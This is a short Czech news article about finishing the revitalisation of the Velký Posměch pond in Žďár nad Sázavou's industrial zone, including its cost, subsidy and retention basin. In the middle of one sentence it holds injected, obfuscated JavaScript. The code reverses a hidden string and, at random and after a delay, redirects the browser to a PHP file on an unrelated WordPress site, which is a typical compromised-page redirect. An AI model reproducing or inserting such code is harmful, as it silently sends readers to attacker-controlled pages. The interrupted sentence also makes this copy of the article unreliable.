Rainbow page separator

Revitalizaci rybníka v průmyslové zóně mají dokončit na jaře

Neděle, 12. března 2023

Žďár nad Sázavou / V jarních měsících mají být dokončeny stavební práce na obnově rybníka Velký Posměch v průmyslové zóně v Jamské ulici. Ty byly zahájeny loni na podzim, vysoutěžená cena zakázky činí 6,3 milionu korun bez DPH, přičemž státní dotace související s takzvanou modrozelenou infrastrukturou, tedy šetrnou k životnímu prostředí, pokryje 5,8 milionu. Součástí revitalizace se stalo především rozšíření a prohloubení retenční nádrže, což je současně spojeno s průmyslovou zónou Jamská II, kde přibývají nové firmy. Vzhledem k $NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tomu, že v lokalitě vznikají další zpevněné plochy, dešťová voda bude odtud stékat do obnoveného rybníka. Využití najde i zemina vybagrovaná z jeho dna, jež je zatím deponovaná na pozemcích podél Sázavské ulice v rozvíjející se čtvrti Klafar a později bude použita při úpravě terénu veřejného parku, s nímž se v lokalitě počítá.